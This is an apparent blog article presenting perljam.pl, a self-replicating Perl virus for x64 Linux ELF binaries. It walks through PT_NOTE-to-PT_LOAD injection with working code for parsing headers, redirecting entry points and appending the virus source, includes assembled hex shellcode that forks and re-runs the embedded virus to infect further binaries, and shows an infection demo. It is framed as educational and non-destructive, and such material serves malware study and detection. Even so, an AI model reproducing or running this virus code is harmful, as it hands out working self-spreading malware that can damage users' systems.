Perljam.pl: A Perl x64 ELF virus

[ intro ]

EHLO. This article describes the implementation of perljam.pl, a proof-of-concept x64 ELF virus written in Perl based mostly on Linux.Midrashim. The virus includes the following features and limitations:

  • It uses the PT_NOTE to PT_LOAD ELF injection technique.
  • It uses a non-destructive hardcoded payload that prints an extract from the song "release" by Pearl Jam and then infects other binaries in the current directory.
  • It works on regular and position independent binaries.
  • It is written in Perl, an interpreted language available by default on most Linux x64 distributions.
  • It does not implement any evasion or obfuscation techniques, making it trivial to detect.

(This is a crosspost from my original article at hckng. You can read it here).

Source code:

https://git.sr.ht/~hckng/vx/tree/master/item/perljam.pl
https://github.com/ilv/vx/blob/main/perljam.pl (mirror)

IMPORTANT NOTE: perljam.pl was made for educational purposes only. I'm not responsible for any misuse or damage caused by this program. Use it at your own risk.

[ part 1: infection ]

The infection is performed using the well-known PT_NOTE to PT_LOAD technique, which overwrites an auxiliary segment in the program headers table and converts it into a loadable segment where executable instructions can be placed without affecting program execution. This method works on both regular and position independent binaries, with the exception of Go executables, which use the PT_NOTE segment to store data needed during execution.

The infection algorithm can be summarized as follows:

  • a) Read the binary and parse its ELF header and program headers table.
  • b) Calculate the address for loading a payload in memory.
  • c) Change the binary's entry point to the previously calculated address.
  • d) Find a PT_NOTE segment and convert it to an executable PT_LOAD segment.
  • e) Adjust PT_LOAD segment's virtual address, file size and memory size.
  • f) Append payload after the binary's code.
  • g) Calculate binary's original entry point relative to the new entry point.
  • h) Append an instruction for jumping back to the binary's original entry point.
  • i) Append the virus source code at the end of the binary.

Relevant parts of the implementation will be discussed in the next sections.

[ read ELF binary and parse its headers ]

The binary is opened with the ':raw' pseudo-layer for passing binary data. Two helper subroutines are used for reading and writing content with the unpack/pack functions:

 # read & unpack
 sub ru {
     my $fh  = shift;
     my $tpl = shift;
     my $sz  = shift;

     read $fh, my $buff, $sz;
     return unpack($tpl, $buff);
 }

 # write & pack
 sub wp {
     my $fh   = shift;
     my $tpl  = shift;
     my $sz   = shift;
     my @data = @_;

     syswrite $fh, pack($tpl, @data), $sz;
 }
 [...]
 open my $fh, '<:raw', $file;

The above subroutines use a given template ($tpl) for converting data from/to the binary. In this case the following templates are used:

  • "C", an unsigned char value (1 byte).
  • "a", a string with arbitrary binary data (1 byte when no count is given).
  • "x", a null byte.
  • "S", an unsigned short value (2 bytes).
  • "I", an unsigned integer value (4 bytes).
  • "q", a signed quad value (8 bytes).
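As a quick illustration of how these templates behave, the following sketch packs a handful of made-up values and unpacks them again. The values are arbitrary and only chosen for the example, and the sizes assume a typical Linux x64 Perl build, where "I" is 4 bytes.

```perl
use strict;
use warnings;

# Pack a few arbitrary values with the templates listed above.
# Whitespace inside a template is ignored by pack/unpack.
my $tpl   = "C a x S I q";
my $bytes = pack($tpl, 0x7f, "E", 0x3e, 1, 0x401000);

# 1 (C) + 1 (a) + 1 (x) + 2 (S) + 4 (I) + 8 (q) bytes
printf "packed length: %d bytes\n", length $bytes;

# "x" writes a null byte when packing and skips a byte when unpacking,
# so it neither consumes nor produces a value.
my @fields = unpack($tpl, $bytes);
printf "fields: %s\n", join ' ', @fields;
```

Note that "x" does not map to an element of the list, which is why the templates used for the ELF header contain more items than the resulting array has entries.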

Based on the ELF header specification, reading the binary's headers and checking the ELF magic numbers can be done as follows:

 my @ehdr = ru($fh, "C a a a C C C C C x7 S S I q q q I S S S S S S", 0x40);

 # for clarity
 my ($e_phoff, $e_phentsize, $e_phnum) = ($ehdr[13], $ehdr[17], $ehdr[18]);

 # skip non ELFs
 # $ehdr[i]  = ei_magi, 0 <= i <= 3
 if($ehdr[0] != 127 && $ehdr[1] !~ "E" && $ehdr[2] !~ "L" && $ehdr[3] !~ "F") {
      close $fh;
      next;
 }
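For reference, identifying an ELF file only requires looking at the first bytes of e_ident. The sketch below is a standalone, read-only check that is not taken from perljam.pl; the subroutine names is_elf and is_elf64 are made up for the example. A buffer is rejected as soon as any of the four magic bytes differs.

```perl
use strict;
use warnings;

# True if the buffer starts with the ELF magic: 0x7f 'E' 'L' 'F'.
sub is_elf {
    my ($ident) = @_;
    return 0 unless defined $ident && length($ident) >= 4;
    return substr($ident, 0, 4) eq "\x7fELF" ? 1 : 0;
}

# True only for 64-bit objects: e_ident[EI_CLASS] (byte 4) == ELFCLASS64 (2).
sub is_elf64 {
    my ($ident) = @_;
    return 0 unless is_elf($ident) && length($ident) >= 5;
    return ord(substr($ident, 4, 1)) == 2 ? 1 : 0;
}

# Hypothetical sample buffers, for illustration only.
for my $sample ("\x7fELF\x02\x01\x01", "\x7fELF\x01\x01\x01", "#!/bin/sh\n") {
    printf "elf=%d elf64=%d\n", is_elf($sample), is_elf64($sample);
}
```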

[ calculate address and change entry point ]

The new entry point of the injected payload must be an address far beyond the end of the original program in order to avoid overlap. For simplicity, the value 0xc000000 plus the size of the binary is chosen, and the modified ELF header is then written to a temporary file.

 # file size
 my $file_sz = (stat $file)[7];
 [...]
 my $far_addr = 0xc000000;
 $ne_entry = $far_addr + $file_sz;
 $oe_entry = $ehdr[12];
 $ehdr[12] = $ne_entry;

 # create tmp file for copying the modified binary
 open my $fh_tmp, '>:raw', "$file.tmp";
 wp($fh_tmp, "C a a a C C C C C x7 S S I q q q I S S S S S S", 0x40, @ehdr);

[ convert PT_NOTE to PT_LOAD and adjust values ]

Next, to parse the entries of the program headers table, the binary is read in chunks based on the values $e_phoff, $e_phnum and $e_phentsize obtained from the binary's ELF header. The expected header values are described in the Program Header specification:

 seek $fh, $e_phoff, "SEEK_SET";
 seek $fh_tmp, $e_phoff, "SEEK_SET";

 # inject the first PT_NOTE segment found
 my $found_ptnote = 0;
 for (my $i = 0; $i < $e_phnum; $i++) {
     #
     # read program header
     # see https://refspecs.linuxbase.org/elf/gabi4+/ch5.pheader.html
     my @phdr = ru($fh, "I I q q q q q q", $e_phentsize);
     [...]
     wp($fh_tmp, "I I q q q q q q", $e_phentsize, @phdr);
 }

When a segment of p_type 4 (PT_NOTE) is found, the values of its entry are modified as follows:

  • p_type = 1 (for converting it to PT_LOAD)
  • p_flags = 5 (PF_R | PF_X, for making it readable and executable)
  • p_offset = $file_sz (offset to end of binary, where payload will be appended)
  • p_vaddr = $ne_entry (the new entry point calculated above)
  • p_filesz += payload size + 5 + virus size (payload + jmp + virus)
  • p_memsz += payload size + 5 + virus size (payload + jmp + virus)
  • p_align = 2 MB (based on [x])
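To see what these fields look like in practice, a program header entry can be decoded into named fields, much like `readelf -l` does. The following is a minimal read-only sketch that works on synthetic buffers rather than on a real file. The subroutine describe_phdr and the sample values are made up for the example, and the "L"/"Q" templates (exactly 32 and 64 bits, unsigned) are a substitution for the "I"/"q" templates used in the article.

```perl
use strict;
use warnings;

# A few segment types from the ELF specification.
my %PT = (0 => 'PT_NULL', 1 => 'PT_LOAD', 2 => 'PT_DYNAMIC',
          3 => 'PT_INTERP', 4 => 'PT_NOTE', 6 => 'PT_PHDR');

# Decode one 56-byte Elf64_Phdr (native byte order) into a summary line.
sub describe_phdr {
    my ($raw) = @_;
    my %h;
    @h{qw(p_type p_flags p_offset p_vaddr p_paddr p_filesz p_memsz p_align)}
        = unpack("L L Q Q Q Q Q Q", $raw);

    # p_flags bits: PF_X = 1, PF_W = 2, PF_R = 4
    my $flags = join '',
        ($h{p_flags} & 4 ? 'R' : '-'),
        ($h{p_flags} & 2 ? 'W' : '-'),
        ($h{p_flags} & 1 ? 'X' : '-');

    return sprintf("%s %s offset=0x%x vaddr=0x%x filesz=0x%x align=0x%x",
        $PT{$h{p_type}} // 'other', $flags,
        @h{qw(p_offset p_vaddr p_filesz p_align)});
}

# Synthetic entries, for illustration only.
my $note = pack("L L Q Q Q Q Q Q", 4, 4, 0x2c4, 0x4002c4, 0x4002c4, 0x44, 0x44, 4);
my $load = pack("L L Q Q Q Q Q Q", 1, 5, 0, 0x400000, 0x400000, 0x1000, 0x1000, 0x200000);
print describe_phdr($_), "\n" for ($note, $load);
```

A typical PT_NOTE entry is small, read-only and aligned to a few bytes, so a PT_LOAD entry with flags R-X, a 2 MB alignment and an offset at the very end of the file stands out when inspecting a binary.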

[ append payload ]

After parsing the entries of the program headers table, the rest of the binary is copied without change, followed by the hardcoded payload (the process of adjusting the payload will be described in part 2).

 # copy rest of file's content
 syswrite $fh_tmp, $_ while(<$fh>);

 #
 # append payload
 #
 syswrite $fh_tmp, $payload_prefix;
 [...]
 # adjust payload
 [...]
 syswrite $fh_tmp, $payload_suffix;

[ calculate relative entry point and append jump instruction ]

The binary's original entry point relative to the entry point of the injected payload is calculated using the formula described in Linux.Midrashim:

newEntryPoint = originalEntryPoint - (p_vaddr + 5) - virus_size

The jump instruction is then appended using this value:

$ne_entry = $oe_entry - ($ne_entry + 5) - $payload_sz;
# 4 bytes only
$ne_entry = $ne_entry & 0xffffffff;
wp($fh_tmp, "C q", 0x9, (0xe9, $ne_entry));
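The arithmetic behind this is the general rule for a 5-byte `jmp rel32` (opcode 0xe9): the CPU adds the 32-bit displacement to the address of the instruction that follows the jump. When the jump sits right after the payload, its address is p_vaddr plus the payload size, which gives the formula above. The sketch below works through the calculation with made-up addresses; the subroutine name rel32 is hypothetical.

```perl
use strict;
use warnings;

# Displacement for a "jmp rel32" located at $jmp_addr that must land on $target.
# The result is wrapped to 32 bits, so backward jumps appear in two's complement.
sub rel32 {
    my ($jmp_addr, $target) = @_;
    return ($target - ($jmp_addr + 5)) & 0xffffffff;
}

# Hypothetical addresses: a jump located high in memory going back to a low address.
my $disp = rel32(0xc004000, 0x401000);
printf "displacement: 0x%08x\n", $disp;

# Encoding: opcode 0xe9 followed by the displacement as 4 little-endian bytes.
my $insn = pack("C V", 0xe9, $disp);
printf "encoded (%d bytes): %s\n", length $insn,
    join ' ', map { sprintf '%02x', $_ } unpack('C*', $insn);
```

The mask with 0xffffffff is what turns a negative difference into the 32-bit two's complement value the instruction expects.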

[ append virus ]

To achieve replication, the perljam.pl source code must be appended to the infected binary. To carry out this task, the virus opens itself (using the predefined variable $0) and appends its content after the jump instruction. Note that if perljam.pl is executed from an infected binary, a search for the string "#!/usr/bin/perl" must be performed first to ensure that only the source code of the virus is copied and not the content of the binary. The virus source code is read once before the main loop and is written on each infection.

 #
 # virus code
 #
 # search for '#!/usr/bin/perl' first to avoid copying extra data
 my $vx;
 open my $fh_vx, '<', $0;
 while(<$fh_vx>) {
    last if($_ =~ q(#!/usr/bin/perl));
 }
 $vx  = "#!/usr/bin/perl\n";
 $vx .= $_ while(<$fh_vx>);
 close $fh_vx;
 # virus size
 my $vx_sz = length($vx);

 [...]
 [...]

 #
 # append virus code
 #
 syswrite $fh_tmp, "\n".$vx;

[ overwrite binary ]

At this point the virus has created an infected copy of the binary. The final step is to delete the original binary and replace it with the infected copy.

 close $fh;
 close $fh_tmp;

 # replace original binary with tmp copy
 unlink $file;
 copy("$file.tmp", $file);
 unlink "$file.tmp";
 chmod 0755, $file;

[ part 2: payload & replication ]

The hardcoded payload consists of two combined shellcodes. The first one prints to stdout an extract from the song "release" by Pearl Jam. The second one performs the virus replication by running the infected binary as a Perl script. For this, the Perl interpreter must be executed using the -x switch, which according to Perl's documentation:

tells Perl that the program is embedded in a larger chunk of unrelated text, such as in a mail message. Leading garbage will be discarded until the first line that starts with #! and contains the string “perl”

Therefore, an execve syscall for "/usr/bin/perl -x infected_binary" will run the perljam.pl source code embedded in the infected binary. This syscall must be invoked inside a child process (fork) to prevent the interruption of the original program code.
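The behaviour of the -x switch can be observed in isolation with a harmless file. The following sketch, which is not part of perljam.pl, writes a temporary file containing a few non-Perl bytes followed by a small script, then runs it with the current interpreter ($^X) and the -x switch. The file contents are made up for the example, and it assumes the temporary path contains no shell metacharacters.

```perl
use strict;
use warnings;
use File::Temp qw(tempfile);

# Build a file with leading bytes that are not Perl, followed by a script.
my ($fh, $path) = tempfile();
binmode $fh;
print {$fh} "\x00\x01leading bytes that are not Perl\n";
print {$fh} "#!/usr/bin/perl\n";
print {$fh} "print qq(hello from the embedded script\\n);\n";
close $fh;

# -x makes perl skip everything before the first "#!" line containing "perl".
my $out = `$^X -x $path`;
print $out;

unlink $path;
```

Without -x the interpreter would try to parse the leading bytes as Perl code and fail.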

However, the "infected_binary" (filename) argument in the execve syscall needs to change on each infection according to the binary's filename. To achieve this, an initial version of the assembly code is assembled using a fixed string of length 255 (maximum filename length on Linux) as the filename argument. This string will be replaced later.

The following assembly code combines the two shellcodes mentioned before:

BITS 64
global _start
section .text
_start:
    call main
    db "i am myself, like you somehow", 0xa, 0x0
    db "/usr/bin/perl", 0x0
    db "-x", 0x0
    db "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
    db "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
    db "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
    db "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx", 0x0
    
 main:
    ;;;;;;;;;;;;
    ; print msg
    ;;;;;;;;;;;;
    xor rax, rax
    xor rdx, rdx
    inc al
    mov rdi, rax
    pop rsi
    mov dl, 30
    syscall

    ;;;;;;;;
    ; fork
    ;;;;;;;;
    xor rax, rax
    mov rax, 57
    syscall
    test eax, eax
    jne parent

    ;;;;;;;;;;;;;;;;;;;;;;;;;
    ; call perl interpreter
    ;;;;;;;;;;;;;;;;;;;;;;;;;

    ; filename "/usr/bin/perl"
    lea rdi, [rsi+31]   
    
    ; argv
    ; ["/usr/bin/perl", "-x", "xxxxx..."] (on reverse)
    xor rdx, rdx
    push rdx
    lea rbx, [rsi+48] ; "xxx..."
    push rbx
    lea rbx, [rsi+45] ; "-x"
    push rbx
    push rdi          ; "/usr/bin/perl"
    mov rsi, rsp 

    ; execve & exit
    xor rax, rax
    mov rax, 59
    mov rdx, 0
    syscall
    xor rdx, rdx
    mov rax, 60
    syscall

 parent:
    ; cleanup for the jmp instruction
    xor rax, rax
    xor rdx, rdx

The code is then assembled to extract its hexadecimal representation.

$ nasm -f elf64 -o perljam.o perljam.s
$ objdump -d perljam.o

After this, the hardcoded payload is generated by removing the hexadecimal representation of the fixed string (\x78 * 255) and then splitting the remaining shellcode in two: before and after the fixed string.

my ($payload_prefix, $payload_suffix);
$payload_prefix  = "\xe8\x30\x01\x00\x00\x69\x20\x61\x6d\x20\x6d\x79\x73\x65";
$payload_prefix .= "\x6c\x66\x2c\x20\x6c\x69\x6b\x65\x20\x79\x6f\x75\x20\x73";
$payload_prefix .= "\x6f\x6d\x65\x68\x6f\x77\x0a\x00\x2f\x75\x73\x72\x2f\x62";
$payload_prefix .= "\x69\x6e\x2f\x70\x65\x72\x6c\x00\x2d\x78\x00";

$payload_suffix  = "\x00\x48\x31\xc0\x48\x31\xd2\xfe\xc0\x48\x89\xc7\x5e\xb2";
$payload_suffix .= "\x1e\x0f\x05\x48\x31\xc0\xb8\x39\x00\x00\x00\x0f\x05\x85";
$payload_suffix .= "\xc0\x75\x2f\x48\x8d\x7e\x1f\x48\x31\xd2\x52\x48\x8d\x5e";
$payload_suffix .= "\x30\x53\x48\x8d\x5e\x2d\x53\x57\x48\x89\xe6\x48\x31\xc0";
$payload_suffix .= "\xb8\x3b\x00\x00\x00\xba\x00\x00\x00\x00\x0f\x05\x48\x31";
$payload_suffix .= "\xd2\xb8\x3c\x00\x00\x00\x0f\x05\x48\x31\xc0\x48\x31\xd2";

The payload is adjusted on each infection by inserting the hexadecimal representation of the infected binary's filename plus N null bytes, where:

N = 255 - length(infected binary’s filename)

Filling with N null bytes after the infected binary's filename keeps the payload at its original length, which ensures that it will not crash at runtime, since adding or removing bytes would shift the offsets used by the shellcode. In addition, the first null byte located after the infected binary's filename will be interpreted as the end of the string and the remaining null bytes will be ignored.
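The fixed-width idea can be illustrated on its own with pack. In the sketch below, which uses a made-up filename and is independent of the virus code, the "a255" template pads the string with null bytes up to 255 bytes, and the "Z*" template reads it back the way C string handling would, stopping at the first null byte.

```perl
use strict;
use warnings;

my $slot  = 255;                      # fixed width of the placeholder
my $name  = "id";                     # hypothetical filename
my $field = pack("a$slot", $name);    # "a" pads with null bytes up to the width

printf "field length: %d\n", length $field;
printf "nulls added:  %d\n", $slot - length $name;

# "Z*" returns everything up to (not including) the first null byte.
printf "string view:  %s\n", unpack("Z*", $field);
```

Keep in mind that "a255" silently truncates input longer than 255 bytes, so a real use of this pattern would need to check the length beforehand.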

The adjustment can be done as follows:

 syswrite $fh_tmp, $payload_prefix;
 # adjust payload with target's filename
 my @chars = split //, $file;
 for(my $i = 0; $i < length($file); $i++) {
     wp($fh_tmp, "C", 0x1, (hex unpack("H2", $chars[$i])));
 } 
 # fill with null values
 for(my $i = length($file); $i < 255; $i++) {
     wp($fh_tmp, "C", 0x1, (0x00));
 }
 syswrite $fh_tmp, $payload_suffix;

[ part 3: run ]

To run:

$ perl perljam.pl

Example:

 $ cp /bin/id .
 $ ./id
 uid=1000(isra) gid=1000(isra) grupos=1000(isra) [..]
 $ perl perljam.pl
 $ ./id
 i am myself, like you somehow
 uid=1000(isra) gid=1000(isra) grupos=1000(isra) [..]
 $ cp /bin/id id2
 $ ./id2
 uid=1000(isra) gid=1000(isra) grupos=1000(isra) [..]
 $ ./id
 i am myself, like you somehow
 uid=1000(isra) gid=1000(isra) grupos=1000(isra) [..]
 $ ./id2
 i am myself, like you somehow
 uid=1000(isra) gid=1000(isra) grupos=1000(isra) [..]

Very interesting, this could also theoretically be done on windows through side loading right?
